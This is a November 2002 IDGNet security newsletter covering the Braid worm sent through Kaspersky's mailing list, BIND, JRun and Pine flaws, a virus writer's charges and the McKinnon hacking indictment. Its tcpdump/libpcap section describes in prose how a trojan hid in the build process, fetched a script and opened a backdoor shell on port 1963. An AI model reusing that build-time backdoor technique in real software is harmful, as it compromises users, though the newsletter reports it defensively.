IDGNet Virus & Security Watch Friday 15th November 2002

This issue's topics: Introduction: * NIS 2003 fix, BIND patches, JRun cumulative patch, virus writer & hacker face trial Virus News: * Kaspersky Labs mailing list distributes virus * Welsh virus writer charged * Symantec fixes e-mail-deleting bug in Norton Internet Security 2003 Security News: * Multiple BIND vulnerabilities * JRun cumulative security patch * Pine 4.44 buffer overflow * English hacker to face US trial for military attacks?

This issue's topics:

Introduction:

* NIS 2003 fix, BIND patches, JRun cumulative patch, virus writer & hacker face trial

Virus News:

* Kaspersky Labs mailing list distributes virus

* Welsh virus writer charged

* Symantec fixes e-mail-deleting bug in Norton Internet Security 2003

Security News:

* Multiple BIND vulnerabilities

* JRun cumulative security patch

* Pine 4.44 buffer overflow

* English hacker to face US trial for military attacks?

Introduction:

No sooner than last week's newsletter had been put to bed, Kaspersky Labs' 'Virus News' mailing list started distributing copies of the Braid worm, mentioned in the newsletter. The respected Russian antivirus developer blames hackers attacking the server hosting the mailing list, but that explanation seems a tad lacking.

In other virus-related news, a Welsh virus writer has been charged with offences under UK computer crimes laws for writing and distributing several viruses early this year and Symantec has released a fix for an e-mail deleting bug in Norton Internet Security 2003.

It was a fairly quiet week for security news apart from the new BIND vulnerabilities. As perhaps the most 'infrastructure critical' software on the Internet, vulnerabilities in DNS software are potentially big problems if not quickly fixed. There are patches for the BIND vulnerabilities now, but there is, perhaps inevitably, wrangling over the distribution of the patches and information about the vulnerabilities. Other security news includes the latest JRun cumulative security patch including fixes for some new vulnerabilities including a remote code execution flaw on Windows platforms and a buffer overflow in Pine 4.44 making for an easy, and annoying, denial of service.

Virus News:

* Kaspersky Labs mailing list distributes virus

Late last week the mass-mailing virus Braid (aka Bridex) was distributed to the 'Virus News' mailing list run by Russian antivirus developer Kaspersky Labs'. From the receiving end of that e-mail message and the subsequent 'bounce' and other delivery rejection messages generated by e-mail virus scanners intercepting the message, it seemed pretty clear that he mailing list server was accepting, and forwarding to the list, all messages addressed to the 'magic' address of the 'Virus News' mailing list.

Several hours after the first virus-infected message was received by list subscribers, Kaspersky Labs issued a press release claiming the mail resulted from a 'massive attack' against its web servers. After successfully hacking in an unspecified way into the mailing list machine (which doubles as one of company's software update web servers), the hackers responsible for the attack were reputedly only interested in sending a virus-infected message to the mailing list. It seems logical that if that were their goal, they would not disclose the ability until they had a 'new' virus to distribute. Why use a virus that was already detected by Kaspersky AntiVirus (which is presumably used by most of the 'Virus News' subscribers) if they could have distributed a virus it did not detect.

Given that several bounce messages and virus scanning e-mail gateway rejection messages addressed back to the mailing list address were also forwarded by the server to the mailing subscribers, it seems more plausible that the mailing list was incorrectly configured. It seems the server was accepting all messages as if for the list, rather than applying some kind of security checks to the messages before sending them to all subscribers. Thus the newsletter compiler received some eight to ten messages through the list server as a result of this incident.

There is an old adage, often credited to Napoleon Bonaparte, that is widely applied in computing circles - 'never ascribe to malice that which is adequately explained by incompetence'. It seems from this distance that the Kaspersky Labs' mailing list server was more likely misconfigured due to some form of administrative oversight and Kaspersky Labs was just unfortunate that the first message to disclose the problem was a virus-generated one, than that it was hacked.

Bridex worm bites computer security company - computerworld.com

Kaspersky Labs reports an attempt to hack its Web server - kaspersky.com

* Welsh virus writer charged

Simon Vallor is alleged to have written and distributed the viruses Gokar, Redesi and Admirer and is now facing charges in the British courts. Rare as such cases are, it is encouraging to those on the defensive against such malicious programs to hear of such arrests and trials.

Welsh Web designer charged with virus writing - theregister.com

* Symantec fixes e-mail-deleting bug in Norton Internet Security 2003

Symantec has released a patch for Norton Internet Security (NIS) 2003 that fixes a rather embarrassing bug. Most people employ a product such as NIS, happy in the belief that it will protect them by scanning incoming e-mail messages and preventing them from accessing messages containing viruses and other 'nasties'. Unfortunately, the initial release of NIS 2003 had a bug such that, in unusual circumstances, it would delete perfectly ordinary e-mail messages, placing blank messages with the cryptic subject line 'Symantec Email Proxy Deleted Message' in their place.

Symantec's Live Update process should have updated all users of the affected software by now. If you are a NIS user and have disabled automatic Live Update, have it set for quite infrequent checks or otherwise suspect it has not run to completion for more than a week it would be a good idea to manually start an update and ensure it runs to completion.

Symantec fixes mail deletion flaw in security suite

Security News:

* Multiple BIND vulnerabilities

BIND, the code that drives most of the Internet's domain name service (DNS) servers, has been found vulnerable to multiple flaws. The disclosure of these vulnerabilities has raised concern as to the stability of the DNS, which is arguably the Internet's most crucial service, mapping domain and server names to IP addresses, and without which most other Internet services would be unworkable. These vulnerabilities follow closely on a brief denial of service attack against the key DNS root servers which is generally agreed was halted by the attacker before the real effect of prolonged attack of the same kind was felt.

BIND versions 4.9.2 through 4.9.10, 8.1, 8.2 through 8.2.6, and 8.3.0 through 8.3.3 inclusive are vulnerable to one or more of several denial of service and remote arbitrary code execution attacks. The Internet Software Consortium (ISC), maintainers of BIND, recommend that users of vulnerable versions upgrade to the newer BIND 9 versions of the software, which can be a far from trivial effort (interestingly, ISC's web page describing the 'F' root server, run by the ISC, says it is running BIND 8.3.3).

Source code diffs patching these vulnerabilities for the BIND 4.9.10, 8.2.6 and 8.3.3 versions have been released by the ISC and are easily found from their home page, linked below. Further, most major Unix and Linux distributors have built and shipped patched builds appropriate to their systems. The CERT Coordination Center has an advisory with more details of the vulnerabilities and a list of the status of these flaws relative to various vendors' products.

ISC home page

CERT Advisory CA-2002-31 Multiple Vulnerabilities in BIND

* JRun cumulative security patch

Users of JRun 3.0, 3.1 or 4.0 should obtain and install the latest cumulative security patch for this product. As well as including all JRun security patches to date, the new cumulative patch includes fixes for five further vulnerabilities, one of which is of significant concern, at least on IIS servers as it is a buffer overflow that allows remote code execution (i.e. a user can run code on the server hosting JRun).

JRun 4.0 users who have installed JRun 4.0 SP1 or SP1a need not obtain this patch as the service packs already contain these fixes.

Macromedia security bulletin MPSB02-12

* tcpdump and libpcap Trojanized

Following on the heels of a couple of similar recent high-profile incidents, the latest version of popular Unix network testing and diagnosis applications libpcap and tcpdump have been Trojanized. The copies on the official distribution site, www.tcpdump.org, and several mirrors were modified to include a Trojan that runs during compilation and installation if the build process provided with the source code is executed. The Trojan code downloads a script from a fixed site and runs that. In turn this script writes out some C source code and compiles and runs it. This program is a simple backdoor that can open a shell to a remote site on port 1963. Such behaviour is masked from tcpdump because code in the libpcap library that tcpdump depends on was also modified so as to ignore all traffic on port 1963.

As of this writing there is no indication of these problems on the tcpdump/libpcap home page, other than the links to the current distribution apparently being dead. It is not known if all mirrors have pulled the Trojanized versions of the code yet and/or replaced them with good original copies. Again, the CERT Coordination Center has a good advisory covering the incident and includes hashes of the 'good' distribution archives. Anyone who has downloaded and built tcpdump 3.7.1 or libpcap 0.7.1 is strongly recommended to check the CERT/CC advisory which informs us the tcpdump/libpcap maintainers recommend the Source Forge repositories as known sources of unmodified code.

Note that the Windows versions of these programs, WinDump and WinPcap are believed unaffected by this recent code Trojanization (if nothing else, their respective home pages suggest their current versions are based on earlier releases of tcpdump and libpcap).

tcpdump/libpcap website

tcpdump at Source Forge

libpcap at Source Forge

CERT Advisory CA-2002-30 Trojan Horse tcpdump and libpcap Distributions

* Pine 4.44 buffer overflow

A remotely exploitable buffer overflow in the Pine 4.44 e-mail client was publicly disclosed this week. Although not known to be exploitable in terms of executing arbitrary code via the overflow, the bug is trivial to exploit and very annoying to deal with, should a Pine user receive an e-mail message with a suitable From: line as any attempt to manipulate the message within Pine causes it to crash. The vulnerability was originally discovered in the version of Pine 4.44 shipped with Red Hat Linux 7.2 and has been publicly confirmed in a Solaris build of the same Pine version. The newsletter compiler has privately verified that the Win32 version of PC-Pine 4.44 is also vulnerable.

This flaw is expected to be fixed in the 4.50 release of Pine. Until that version is released, sites using Pine may wish to read the original advisory describing the problem and devise a suitable incoming e-mail filter to block messages that may be attempting to exploit this vulnerability. (The newsletter maintainer notes that the exploit may work on some architectures with fewer characters than listed in the advisory.)

Archived Bugtraq list message - securityfocus.com

* English hacker to face US trial for military attacks?

In what has been dubbed the biggest hack against US military computer systems ever, British man Gary McKinnon has been indicted on several counts of computer fraud in the US and will soon face extradition hearings in the UK. US federal prosecutors allege that between March 2001 and March this year, McKinnon broke into at least 105 different US government, military and corporate networks and caused at least US$900,000 in damages. This tally includes machines managed by NASA and the Pentagon.

Included in the damage estimates is the cost of recovering systems deliberately damaged by the attacker. McKinnon is alleged to have stolen passwords and other non-classified information from systems he compromised and to have deleted files and caused other damage requiring systems to be shut down. Perhaps most interesting in the allegations is that McKinnon's actions forced the shutdown of systems at the US Navy' Naval Weapons Station Earle in New Jersey about two weeks after 11 September.

More details of the allegations are in the news article linked below.

Massive hacking spree halted; man indicted - computerworld.com

Join the newsletter!

Error: Please check your email address.

More about CERT AustraliaForge GroupInternet Software ConsortiumKasperskyLinuxMacromediaNASANortonRed HatSymantec

Show Comments
[]